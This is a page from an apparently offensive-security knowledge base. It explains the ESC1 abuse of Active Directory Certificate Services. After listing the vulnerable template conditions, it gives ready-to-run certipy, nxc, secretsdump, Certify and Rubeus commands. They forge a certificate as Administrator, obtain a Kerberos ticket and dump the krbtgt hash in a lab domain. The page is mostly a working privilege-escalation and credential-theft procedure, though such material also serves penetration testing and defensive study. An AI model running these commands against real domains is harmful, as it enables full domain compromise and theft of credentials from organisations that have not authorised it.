Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 04. Techniques / ADCS / Techniques

ESC1

ESC1 abuses a template where the enrollee can supply the subject and the resulting certificate is valid for client authentication. We request a certificate that maps to a privileged user, then authenticate with that certificate.

Conditions

Template is enabled on a CA.
Requester has enrollment rights.
Enrollee Supplies Subject is enabled.
Client Authentication, Smart Card Logon, PKINIT Client Authentication, Any Purpose, or equivalent authentication EKU is present.
Manager approval is not required.
Authorized signatures required is 0.

Find ESC1

certipy find -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -vulnerable -enabled -stdout

Get target SID

certipy account -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -user administrator read

Request certificate as Administrator

certipy req -u 'student@ootw.local' -p 'student' -dc-ip 10.10.10.200 -ca 'OOTW-CA' -template ESC1 -upn administrator@ootw.local -sid '<ADMINISTRATOR_SID>' -out administrator

Authenticate with certificate

certipy auth -pfx administrator.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
klist

Use the ticket

nxc smb 10.10.10.200 -d ootw.local -u administrator -k --use-kcache
secretsdump.py -k -no-pass ootw.local/administrator@dc01.ootw.local -dc-ip 10.10.10.200 -just-dc-user krbtgt

Windows with Certify

Certify.exe request --ca "dc01.ootw.local\OOTW-CA" --template ESC1 --upn Administrator --quiet
$CertB64 = "CERT_B64"
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$CertB64 /enctype:aes256 /ptt
klist

Notes

Use -sid when possible. Modern certificate mapping behavior can reject weak mappings where only the UPN is supplied. The SID extension makes the certificate map to the intended account more reliably in patched environments.